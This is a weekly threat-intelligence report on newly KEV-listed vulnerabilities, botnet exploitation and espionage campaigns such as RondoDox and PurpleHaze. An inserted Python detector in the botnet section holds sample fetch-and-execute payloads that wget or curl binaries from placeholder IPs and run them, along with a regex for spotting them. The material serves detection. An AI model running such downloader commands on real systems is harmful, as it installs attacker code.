Executive Summary
In a sharp reminder that outdated software flaws continue to pose real-world threats, CISA added five vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog this week. Four of them are legacy issues in widely used technologies (PHPMailer, Zimbra Collaboration Suite, Multi-Router Looking Glass, and Ruby on Rails), including one dating back nearly a decade. The fifth and most recent addition is a flaw in Citrix NetScaler ADC and Gateway, which has a public proof-of-concept and is actively exploited in the wild. Despite long-standing patches for the legacy flaws, their exploitation underscores the persistent risk posed by unpatched systems across sectors.
At the same time, botnet families like EnemyBot, Sysrv-k, Andoryu, and Androxgh0st aggressively targeted unpatched vulnerabilities in platforms such as GitLab, Cloud Gateway, and various PHP-based services. Meanwhile, IoT-focused botnets including Bashlite, BrickerBot, Tsunami, and Mirai intensified their activity, launching widespread attacks against exposed Eir D1000 devices and rapidly compromising internet-facing systems.
This week, cyber espionage operations resurfaced prominently, with threat actors actively exploiting known vulnerabilities across industrial and enterprise systems. Fortinet revealed a stealthy botnet operation, RondoDox, targeting flaws in TBK DVRs and Four-Faith routers. AhnLab Security Intelligence Center (ASEC) reported ongoing abuse of a remote code execution flaw in GeoServer to deploy NetCat reverse shells and XMRig CoinMiners. Meanwhile, SentinelLabs uncovered a high-profile cyber espionage operation attributed to China-nexus actors under the PurpleHaze cluster, leveraging vulnerabilities in Ivanti, ConnectWise, and GeoServer GeoTools to target government, media, and cybersecurity sectors.
Trending / Critical Vulnerabilities
Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.
CVE-2025-5777
An Out-of-Bounds Read Vulnerability in Citrix NetScaler ADC and Gateway has raised critical security concerns, earning a CVSS Score of 9.3. Now informally dubbed "Citrix Bleed 2", this flaw arises from insufficient input validation, potentially enabling threat actors to exfiltrate sensitive information or gain unauthorized access to affected systems. A publicly available proof-of-concept (PoC) has further escalated the urgency of this issue. Its recent addition to the CISA Known Exploited Vulnerabilities (KEV) catalog highlights ongoing exploitation in the wild. Organizations running vulnerable versions are strongly advised to apply the latest patches without delay to mitigate the risk of compromise.
CVE-2019-5418
A Path Traversal Vulnerability in the Ruby on Rails' Action View component has been added to the CISA KEV catalog, signaling confirmed in-the-wild exploitation. Rated with a high CVSS Score of 7.5, this flaw allows attackers to manipulate file paths and potentially access arbitrary files on the system. Originally addressed in March 2019, the issue was patched across multiple Rails versions, including 4.2.11.1, 5.0.7.2, 5.1.6.2, 5.2.2.1, and 6.0.0.beta3 and later. With proof-of-concept code publicly available, the renewed attention underscores the importance of applying long-standing patches, especially for legacy systems still relying on older Rails deployments.
CVE-2019-9621
A Server-Side Request Forgery (SSRF) Vulnerability in the ProxyServlet component of Synacor's Zimbra Collaboration Suite has recently been added to the CISA KEV catalog, highlighting ongoing exploitation activity. With a high CVSS Score of 7.5, this flaw allows attackers to manipulate Zimbra servers into making unauthorized requests to internal or external systems, potentially leading to sensitive data exposure or remote code execution. Zimbra addressed the issue through multiple patch releases, including 8.7.11 Patch 11, 8.8.9 Patch 10, 8.8.10 Patch 8, 8.8.11 Patch 4, and the full release of 8.8.12 in April 2019. This vulnerability gained notable attention in September 2023 when Trend Micro linked its exploitation to the China-based threat group Earth Lusca, further emphasizing the threat's real-world impact.
CVE-2016-10033
A Command Injection Vulnerability in PHPMailer affects versions prior to 5.2.18, specifically within the mail() function of the class.phpmailer.php script. This flaw allows remote attackers to execute arbitrary code within the application's context by injecting malicious parameters into email fields. Even failed exploitation attempts can lead to denial-of-service conditions. The issue stems from improper sanitization of user-supplied input before it is passed to the underlying sendmail process. The vulnerability was addressed back in 2016 with the release of PHPMailer version 5.2.18. Despite being patched years ago, it has now been added to the CISA KEV catalog, signaling active exploitation in the wild.
CVE-2014-3931
A Buffer Overflow Vulnerability in Multi-Router Looking Glass (MRLG) affects versions prior to 5.5.0, enabling remote attackers to perform arbitrary memory writes and trigger memory corruption. This flaw, rooted in outdated web scripting practices and direct telnet/SSH access to backbone routers, significantly endangers network infrastructure. Looking Glass applications, commonly written in PHP or Perl during the 1990s and early 2000s, are still deployed by many Autonomous Systems (ASes) to provide limited public access for diagnosing BGP routing issues. These legacy tools represent a high-risk attack surface due to their privileged network access and infrequent maintenance. The vulnerability was patched in 2014 with the release of MRLG version 5.5.0, yet its recent addition to the CISA KEV catalog highlights ongoing real-world exploitation even a decade later.
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights into what is actively being exploited and actively being scanned. As a source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.
Vulnerabilities abused by Botnet
Identified vulnerabilities exploited by botnets, including recent CVEs logged in MISP. Presented below are the top 5 CVEs with payloads suggestive of botnet activity, such as the use of wget with raw IP addresses.
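The "wget with an IP address" heuristic used above for ranking the top CVEs, worked through as an added example that is not part of the original report. It runs over constructed sensor hits (the CVE labels and payloads are illustrative, not Loginsoft telemetry) and extends the heuristic to curl, since both downloaders appear in the same staging pattern.

```python
import re
from collections import Counter

# Constructed sample sensor hits: (CVE the payload targeted, raw command payload).
# Addresses are from documentation ranges; none of this is real telemetry.
SAMPLE_HITS = [
    ("CVE-2024-3721", "cd /tmp; wget http://203.0.113.7/arm7; chmod +x arm7; ./arm7"),
    ("CVE-2024-12856", "curl -s http://198.51.100.23:8080/bins.sh | sh"),
    ("CVE-2024-36401", "wget https://updates.example.net/agent.tgz"),
    ("CVE-2024-3721", "ls -la /etc"),
    ("CVE-2024-12856", "wget http://198.51.100.23/mips; sh mips"),
]

IPV4 = r"(?:\d{1,3}\.){3}\d{1,3}"
# A downloader (wget or curl) whose URL host is a bare IPv4 literal, optionally
# with a port. Hostname-based downloads do not match; botnet stagers almost
# always hard-code an IP, which is the signal the report's heuristic relies on.
BOTNET_FETCH = re.compile(
    r"\b(wget|curl)\b[^;|&]*?https?://(" + IPV4 + r")(?::\d+)?/", re.IGNORECASE
)


def botnet_indicators(payload):
    """Return (tool, ip) pairs for every IP-based fetch in the payload, or []."""
    return [(m.group(1).lower(), m.group(2)) for m in BOTNET_FETCH.finditer(payload)]


def top_botnet_cves(hits, n=5):
    """Count hits per CVE whose payload looks like botnet staging; return top n."""
    counts = Counter()
    for cve, payload in hits:
        if botnet_indicators(payload):
            counts[cve] += 1
    return counts.most_common(n)


def staging_hosts(hits):
    """Unique IPs the flagged payloads download from (a starting point for blocklists)."""
    return sorted({ip for _, payload in hits for _, ip in botnet_indicators(payload)})


if __name__ == "__main__":
    for cve, count in top_botnet_cves(SAMPLE_HITS):
        print(f"{cve}: {count} botnet-like payload(s)")
    print("staging hosts:", staging_hosts(SAMPLE_HITS))
```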
Vulnerabilities Abused by Malware
We proactively monitor the vulnerabilities targeted by adversaries. Each vulnerability is studied by an analyst and mapped to MITRE ATT&CK tactics and techniques. The information is derived from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites, and more.
RondoDox Botnet campaign
Fortinet researchers have uncovered a sophisticated malware campaign exploiting known vulnerabilities in TBK digital video recorders (DVRs) and Four-Faith industrial routers to build a stealthy botnet dubbed RondoDox. The operation leverages CVE-2024-3721, a command injection flaw in TBK DVR-4104 and DVR-4216 models, and CVE-2024-12856, an OS command injection flaw affecting Four-Faith router models F3X24 and F3X36. Initial signs of RondoDox activity were observed in September 2024, marked by the discovery of an ELF binary designed to blend into legitimate network traffic by impersonating gaming or VPN traffic patterns.
What sets RondoDox apart is its strategic use of compromised devices, not as traditional DDoS bots, but as proxy infrastructure to mask malicious activity. These hijacked systems are weaponized to conceal command-and-control (C2) traffic, conduct multi-stage fraud operations, and bolster DDoS-for-hire schemes that mix financial motives with disruptive attacks.
Technical analysis reveals that RondoDox initially targeted Linux environments running on ARM and MIPS architectures. The threat has since expanded its reach using a shell script-based downloader capable of infecting a wide range of Linux-based systems, including Intel 80386, x86-64, AArch64, MC68000, PowerPC, SuperH, MIPS R3000, and ARCompact, signaling a rapidly evolving and architecture-agnostic botnet threat.
CVE-2024-36401
The AhnLab Security Intelligence Center (ASEC) has issued a new alert regarding the continued exploitation of a remote code execution vulnerability in GeoServer, identified as CVE-2024-36401. This flaw is actively being targeted in live attacks across both Windows and Linux systems. ASEC reports that threat actors are leveraging the vulnerability to deploy NetCat-based reverse shells for remote access and XMRig CoinMiners to abuse system resources for illicit cryptocurrency mining. In one observed campaign targeting South Korean infrastructure, attackers exploited unpatched GeoServer instances running on Windows by executing PowerShell commands to fetch and run malicious scripts. These scripts were responsible for installing NetCat and XMRig, enabling persistent access and unauthorized resource consumption. ASEC confirmed that unpatched GeoServer systems remain under continuous attack, with widespread scanning activity observed as attackers hunt for exploitable instances.
PurpleHaze espionage campaign
Between July 2024 and March 2025, SentinelLabs uncovered a highly targeted cyber espionage campaign attributed to China-linked threat actors operating under the cluster known as PurpleHaze, with overlaps to the known groups APT15 and UNC5174. The campaign involved reconnaissance and intrusions across more than 70 organizations worldwide, including entities in the government, manufacturing, finance, media, logistics, telecommunications, and cybersecurity sectors. A notable part of the operation was reconnaissance activity against SentinelOne's own internet-facing infrastructure in October 2024, where the threat actors conducted controlled scans to evaluate exposed systems, likely as a precursor to more aggressive follow-ups.
The technical core of the PurpleHaze operation relied heavily on exploitation of known vulnerabilities. The attackers leveraged CVE-2024-8963 and CVE-2024-8190, both affecting Ivanti Connect Secure, just days before their public disclosure to establish an initial foothold. They further capitalized on CVE-2023-46747 in F5 BIG-IP devices and CVE-2024-1709 in ConnectWise ScreenConnect to escalate access and maintain persistence across compromised environments. These CVEs played a crucial role in enabling the threat actors to infiltrate target networks quickly and discreetly. Malware deployment was equally strategic: PurpleHaze actors utilized GoReShell, which communicated with command-and-control servers via SSH over WebSocket, effectively blending into legitimate traffic. The attackers maintained a distributed command-and-control architecture that included assets hosted in multiple countries.
PRE-NVD observed for this week
PRE-NVD refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.
External References
- https://www.cisa.gov/news-events/alerts/2025/07/07/cisa-adds-four-known-exploited-vulnerabilities-catalog
- https://www.cisa.gov/news-events/alerts/2025/07/10/cisa-adds-one-known-exploited-vulnerability-catalog
- https://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/
- https://asec.ahnlab.com/en/88917/
- https://www.fortinet.com/blog/threat-research/rondobox-unveiled-breaking-down-a-botnet-threat
- https://levelblue.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers
- https://blog.apnic.net/2021/12/23/preparing-for-the-next-large-scale-iot-botnet-attack/